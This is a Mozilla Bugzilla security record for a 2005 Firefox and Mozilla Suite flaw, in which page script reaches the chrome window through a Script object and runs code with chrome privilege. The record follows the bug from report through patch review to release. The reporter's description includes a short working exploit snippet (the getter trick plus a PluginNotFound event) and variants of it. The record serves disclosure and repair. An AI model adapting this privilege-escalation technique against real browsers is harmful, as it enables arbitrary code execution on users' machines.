Bug 290908 (Closed)
Opened 19 years ago
Closed 19 years ago
new Script() can access chrome window and run arbitrary code with chrome privilege
Categories: Core :: Security, defect
Status: RESOLVED FIXED
People: Reporter: moz_bug_r_a4, Assigned: brendan
Keywords: fixed-aviary1.0.4, fixed1.7.8
Whiteboard: [sg:fix] trunk version rolled into 281988
Attachments (4 files)
    622 bytes, text/html
    825 bytes, text/html
    675 bytes, text/html
    1.23 KB, patch (flags: shaver: review+; dbaron: superreview+; asa: approval-aviary1.0.4+; brendan: approval1.7.8+)
Description • Reporter • 19 years ago

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3

Firefox 1.0.3: missingPluginInstaller.prototype.newMissingPlugin (in browser.js) is another event handler that can be used to make chrome access a non-DOM JS property (related to Bug 289961).

Mozilla 1.7.7: hrefForClickEvent (in contentAreaClick.js) is the function that can be used to make chrome access a non-DOM JS property (related to Bug 290324).

There is a way to circumvent the fix presented in bug 289074 comment 79. The code in a Script object can access |arguments.callee.__parent__|, which is the chrome window, and |arguments.callee.__parent__.eval()| is executed with chrome privilege.

Exploit:

    var scriptCode = "arguments.callee.__parent__.eval('" + MALICIOUS_CODE + "');'';";
    var script = (function() {
      function x() { new Object(); }
      return new Script(scriptCode);
    })();
    document.body.__defineGetter__("type", script);
    var event = document.createEvent("Events");
    event.initEvent("PluginNotFound", true, true);
    document.body.dispatchEvent(event);

Note: it is important how the Script object is created. A, B, and C cause this error: "Error: arguments is not defined". I don't know why D can access |arguments|.

    A) var script = new Script(scriptCode);

    B) var script = (function() { return new Script(scriptCode); })();

    C) var script = (function() {
         function x() { "a"; }
         return new Script(scriptCode);
       })();

    D) // any Object (window, document, new Array(), ...)
       var anyObj = new Object();
       var script = (function() {
         function x() { anyObj; }
         return new Script(scriptCode);
       })();

I have confirmed that the following testcases work in:

[Firefox] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
[Mozilla Suite] Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414

Reproducible: Always

Steps to Reproduce:
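The report relies on ordinary JavaScript accessor semantics: once untrusted code defines a getter on an object that privileged (chrome) code later reads, the read itself runs the untrusted function. The block below is an added illustration in plain JavaScript, not the reporter's testcase and not Mozilla code: it plants a getter on a constructed object, shows that a naive property read invokes it, and shows a reader that inspects the property descriptor and refuses accessors. The names `untrustedObj`, `naiveRead`, `readDataPropertyOnly` and `demo` are this example's own.

```javascript
// Added illustration of the risk in this bug: privileged code must not
// blindly read properties of objects it did not create, because a property
// read can run an attacker-defined getter. Names are this example's own.

// Records whether the untrusted getter ran.
const trace = [];

// Constructed stand-in for an object controlled by untrusted content code.
// It defines an accessor named "type", mirroring the getter on document.body
// in the report.
const untrustedObj = {};
Object.defineProperty(untrustedObj, "type", {
  get() {
    trace.push("getter invoked");
    return "application/x-constructed";
  },
  enumerable: true,
  configurable: true,
});

// Naive read: the property access runs the untrusted getter as a side effect.
function naiveRead(obj, name) {
  return obj[name];
}

// Guarded read: accept only own data properties. Descriptor inspection does
// not invoke getters, and refusing inherited properties closes the prototype
// chain as a place to plant an accessor.
function readDataPropertyOnly(obj, name) {
  const desc = Object.getOwnPropertyDescriptor(obj, name);
  if (desc === undefined) {
    return { ok: false, reason: "no own property" };
  }
  if (typeof desc.get === "function" || typeof desc.set === "function") {
    return { ok: false, reason: "accessor property refused" };
  }
  return { ok: true, value: desc.value };
}

// Returns a summary instead of printing so the behaviour can be checked.
function demo() {
  trace.length = 0;
  const naive = naiveRead(untrustedObj, "type");
  const naiveRanGetter = trace.length;      // 1: the getter ran

  trace.length = 0;
  const guarded = readDataPropertyOnly(untrustedObj, "type");
  const guardedRanGetter = trace.length;    // 0: the getter did not run

  // A plain data property passes the guard unchanged.
  const plain = { type: "text/html" };
  const plainResult = readDataPropertyOnly(plain, "type");

  // An inherited property is refused even though obj[name] would find it.
  const inherited = Object.create({ type: "inherited" });
  const inheritedResult = readDataPropertyOnly(inherited, "type");

  return { naive, naiveRanGetter, guarded, guardedRanGetter, plainResult, inheritedResult };
}
```

The guarded reader is the general shape of the mitigation: privileged code reads untrusted objects through a path that cannot execute untrusted functions, rather than through plain property access.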
Comment 1 • Reporter • 19 years ago

for Firefox/1.0.3
Comment 2 • Reporter • 19 years ago

for Mozilla/1.7.7
Comment 3 • Reporter • 19 years ago

each of the ways to create Script object
Comment 4 • Assignee • 19 years ago

Testcase 1 is quite clever. Another bounty for moz_bug_r_a4! The patch in bug 290324 stops testcase 2. Testcase 3 merely shows how to get an outer function invocation to have an activation (Call in SpiderMonkey) object: nest an inner function that uses a non-local identifier. /be
Assignee: dveditz → brendan
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 5 • 19 years ago

(In reply to comment #4)
> The patch in bug 290324 stops testcase 2.

No, it's the suite version of testcase 1.
Comment 6 • Assignee • 19 years ago

Er, dbaron points out that testcase 2 is for the suite. It's the suite version of testcase 1, I guess. More tomorrow. Thanks again, moz_bug_r_a4. /be
Status: NEW → ASSIGNED
Comment 7 • 19 years ago

The more JS can interact with chrome, the more exploits, especially if chrome executes JS.
Comment 8 • Assignee • 19 years ago

Attachment #181234 - Flags: superreview?(dbaron)
Attachment #181234 - Flags: review?(jst)
Attachment #181234 - Flags: approval1.7.8?
Attachment #181234 - Flags: approval-aviary1.0.4?
Comment 9 • Assignee • 19 years ago

Comment on attachment 181234 (fix): jst, feel free to review too. /be

Attachment #181234 - Flags: review?(jst) → review?(shaver)
Comment 10 • 19 years ago

Comment on attachment 181234 (fix): r=shaver

Attachment #181234 - Flags: review?(shaver) → review+
Comment 11 • Assignee • 19 years ago

Thanks to bz for some productive discussion, part of which suggested this patch. /be

Comment 12 • 19 years ago

Comment on attachment 181234 (fix): I really don't understand this anymore, but sr=dbaron.

Attachment #181234 - Flags: superreview?(dbaron) → superreview+
Updated • 19 years ago
Flags: blocking1.8b2+
Flags: blocking1.7.8+

Updated • 19 years ago
Depends on: 281988
Whiteboard: [sg:fix] → [sg:fix] trunk version rolled into 281988

Updated • 19 years ago
Flags: blocking1.8b2+
Flags: blocking-aviary1.1+
Comment 13 • Assignee • 19 years ago

Comment on attachment 181234 (fix): Got dveditz and drivers approval on IRC. Checking in, with the same change to obj_eval (indirect call error). /be

Attachment #181234 - Flags: approval1.7.8? → approval1.7.8+
Attachment #181234 - Flags: approval-aviary1.0.4? → approval-aviary1.0.4+
Comment 14 • Assignee • 19 years ago

Checked into branches. /be

Status: ASSIGNED → RESOLVED
Closed: 19 years ago
Resolution: --- → FIXED

Updated • 19 years ago
Flags: blocking-aviary1.0.5+ → blocking-aviary1.0.4+

Updated • 19 years ago
Attachment #181234 - Flags: approval-aviary1.0.5+ → approval-aviary1.0.4+
Comment 15 • 19 years ago

Other than the attached test cases, are there other areas or things we could test to ensure that this didn't regress anything? Thanks!
Comment 16 • 19 years ago

In Firefox 1.0.4/winxp, I am getting the following for testcase 3:

    A) ReferenceError: arguments is not defined
    B) ReferenceError: arguments is not defined
    C) ReferenceError: arguments is not defined
    D) [object Object]

Was D) supposed to be fixed?

Updated • 19 years ago
Keywords: fixed-aviary1.0.4, fixed1.7.8
Comment 17 • 19 years ago

Clearing security flag from announced vulnerabilities fixed in Firefox 1.0.4/Mozilla 1.7.8

Group: security

Updated • 18 years ago
Flags: testcase+

Updated • 17 years ago
Flags: in-testsuite+ → in-testsuite?